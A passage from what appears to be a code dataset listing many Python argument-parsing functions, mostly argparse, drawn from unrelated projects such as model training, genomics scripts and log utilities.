args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! 
(\" + argument + \")\")", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = parser.parse_args()\n return args", "def parseArgs():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default='fsod', help='training dataset') # use fsod dataset for default\n parser.add_argument('--cfg', dest='cfg_file', required=True, help='optional config file')\n parser.add_argument('--load_ckpt', help='path to load checkpoint')\n parser.add_argument('--load_detectron', help='path to load detectron weight pickle file')\n parser.add_argument('--output_dir', help='output directory to save the testing results.')\n parser.add_argument('--range', help='[start, end)', type=int, nargs=2)\n parser.add_argument('--visualize', dest='visualize', help='output images of detection', action='store_true')\n return parser.parse_args()", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to 
training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def parse_args():\n\tparser = argparse.ArgumentParser(description='Show video statistics.')\n\tparser.add_argument('--sort', metavar='FIELD', choices=['views', 'likes', 'dislikes'],\n\t default='views',\n\t help='sort by the specified field. Options are views, likes and dislikes.')\n\tparser.add_argument('--max', metavar='MAX', type=int, help='show the top MAX entries only.')\n\tparser.add_argument('--csv', action='store_true', default=False,\n\t help='output the data in CSV format.')\n\tparser.add_argument('--table', action='store_true', default=False,\n\t help='output the data in an ascii table.')\n\tparser.add_argument('--workers', type=int, default=8,\n\t help='number of workers to use, 8 by default.')\n\treturn parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"A script to get the kmer frequency\n from csv files with kmer counts from genomes.\"\"\")\n\n parser.add_argument('-sd',\n '--sub_dir',\n type=str,\n dest='sub_dir',\n help='Subdirectory name for output files.') # kmer_count\n\n parser.add_argument('-do',\n '--dir_out',\n type=str,\n dest='dir_out',\n help='directory name for output files.') # Results/kmer_freq\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"-threads\", help=\"specifies a thread count for parallel operations\", type=int)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. 
By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def argumentsParser(args):\n\targuments = []\n\tif args.find('\"') > -1:\n\t\tt_arguments = args.split('\"')\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args.find(\"'\") > -1:\n\t\tt_arguments = args.split(\"'\")\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args == ' ':\n\t\tpass\n\telse:\n\t\targuments = args.split(' ')\n\treturn arguments", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_args(args=None):\n return AP.parse_args(args=args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--obs_len\",\n default=20,\n type=int,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--data_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--feature_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the computed features are saved\",\n )\n parser.add_argument(\"--mode\",\n required=True,\n type=str,\n help=\"train/val/test/compute_all/lanes_only\")\n parser.add_argument(\n \"--sequence_num\",\n default=-1,\n type=int,\n help=\"Specify a specific sequence to visualize.\",\n )\n parser.add_argument(\n \"--batch_start\",\n default=0,\n type=int,\n help=\"Specify the starting row of features to visualize.\",\n )\n parser.add_argument(\n \"--batch_end\",\n default=-1,\n type=int,\n help=\"Specify the last row to visualize, -1 to visualize till end.\",\n )\n parser.add_argument(\n \"--single_figure\",\n default=False,\n action=\"store_true\",\n help=\"Plot all candidates for a scenein one figure.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = 
argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... 
copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def Args(parser):", "def parse_args():\n parser = ArgumentParser()\n parser.add_argument('-t', '--timer', action='store_true', \\\n help='Time the first random generation')\n parser.add_argument('-i', '--ibmq', default='', help='IBMQ token')\n parser.add_argument('-b', '--backend', default='', help='IBMQ backend')\n return parser.parse_args()", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n 
p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def parse_args():\n\n parser = argparse.ArgumentParser(description='Disk metric sender')\n parser.add_argument('-v', '--verbose', action='store_true', default=None, help='Verbose?')\n parser.add_argument('--debug', action='store_true', default=None, help='Debug?')\n\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument('session', help='Session Label')\n ap.add_argument('-sd', '--subjects_dir', help='Subjects Dir',\n default='/tmp')\n return ap.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def _parse_args(argv):\n parser = make_parser()\n args = parser.parse_args(argv)\n LOGGER.setLevel(to_log_level(args.loglevel))\n\n if not args.inputs:\n if args.list:\n tlist = \", \".join(API.list_types())\n _exit_with_output(\"Supported config types: \" + tlist)\n elif args.env:\n cnf = os.environ.copy()\n _output_result(cnf, args.output, args.otype or \"json\", None, None)\n sys.exit(0)\n else:\n parser.print_usage()\n sys.exit(1)\n\n if args.validate and args.schema is None:\n _exit_with_output(\"--validate option requires --scheme option\", 1)\n\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"file with the cohort you want to check / fix\", type=str, required=True)\n parser.add_argument(\"-o\", \"--outdir\", help=\"where should the files and the result readme be stored?\", type=str, required=True)\n return parser.parse_args()", "def arg_parse():\n p = ap.ArgumentParser()\n 
p.add_argument('infile',\n help='path to file containing objects')\n p.add_argument('n1',\n help='night 1')\n p.add_argument('n2',\n help='night 2')\n p.add_argument('observatory',\n help='Astropy name of observatory')\n return p.parse_args()", "def parse_args():\n parser = OptionParser()\n parser.add_option('--data-file', '-f', default='train_data.hdf5',\n help=\"The path to the data file\")\n parser.add_option('--runs-per-epoch', '-r', type='int',\n help=\"The number of runs per epoch (train samples count)\")\n parser.add_option('--avg-window-size', '-w', default='1', type='int',\n help=\"The window size for moving average\")\n\n (options, args) = parser.parse_args()\n return options", "def parse_arguments():\n #usage = \"usage: %(prog)s [options] <message file>\" + DESCRIPTION\n parser = ArgumentParser()\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('source', metavar='source', help='input logfile or directory with logfiles')\n\n \"\"\"\n parser.add_argument('-m', '--mat-id', metavar='string', # or stare_false\n dest=\"id_mat\", default='', # negative store value\n help=\"material id to grep\")\n parser.add_argument('-c', '--count', metavar='N', type=int, # or stare_false\n dest=\"count\", default=0, # negative store value\n help=\"count\")\n parser.add_argument('-p', '--pattern', metavar='string', # or stare_false\n dest=\"pattern\", default='xxx', # negative store value\n help=\"search pattern within logfile\")\n \"\"\"\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Subscription Watch CSV file packaging script\", prog=sys.argv[0])\n\n # required args\n parser.add_argument(\"-f\", \"--filepath\", required=True,\n help=\"path to files to package\")\n parser.add_argument(\n \"-s\",\n \"--max-size\",\n type=int,\n default=DEFAULT_MAX_SIZE,\n help=f\"Maximum size of packages in MiB. 
(Default: {DEFAULT_MAX_SIZE} MiB)\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", default=False, help=\"whether to overwrite existing files.\"\n )\n parser.add_argument(\"--ocp-cluster-id\", required=True,\n help=\"OCP Cluster ID\")\n parser.add_argument(\"-v\", \"--verbosity\", action=\"count\",\n default=0, help=\"increase verbosity (up to -vvv)\")\n return parser.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n 
path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file (.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. 
Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def _parse_args():\n args = sys.argv[1:]\n cmd_parser = argparse.ArgumentParser()\n cmd_parser.add_argument(\n '--produce-sub',\n dest='produce_sub',\n help='Produce submision file',\n default=False,\n action='store_true',\n )\n cmd_parser.add_argument(\n '--search-cv',\n dest='search_cv',\n help='Perform Search of parameters',\n default=False,\n action='store_true',\n )\n cmd_opts = cmd_parser.parse_args(args=args)\n return cmd_opts", "def parseInputArgs():\n parser = argparse.ArgumentParser(description=\"Unix cut analog\", usage='%(prog)s [arguments]')\n\n # pos arg\n parser.add_argument('filename', type=str, help='input file name')\n\n # req arg\n requiredNamed = parser.add_argument_group('required arguments')\n requiredNamed.add_argument('-f', '--fields', type=str, help='list of fields, separated by comma', required=True)\n # optional args\n parser.add_argument('-s', '--separator', type=str, default='\\t', help='column separator, default tab')\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Note: Plot depth files.\")\n parser.add_argument(\"-d\", \"--depth_dir\", help='depth file directory')\n parser.add_argument(\"-r\", \"--result_dir\", help='output directory')\n parser.add_argument(\"-f\", \"--ref\", help='one depth file as ref')\n parser.add_argument(\"-w\", \"--window_size\", help='sliding window size')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff 
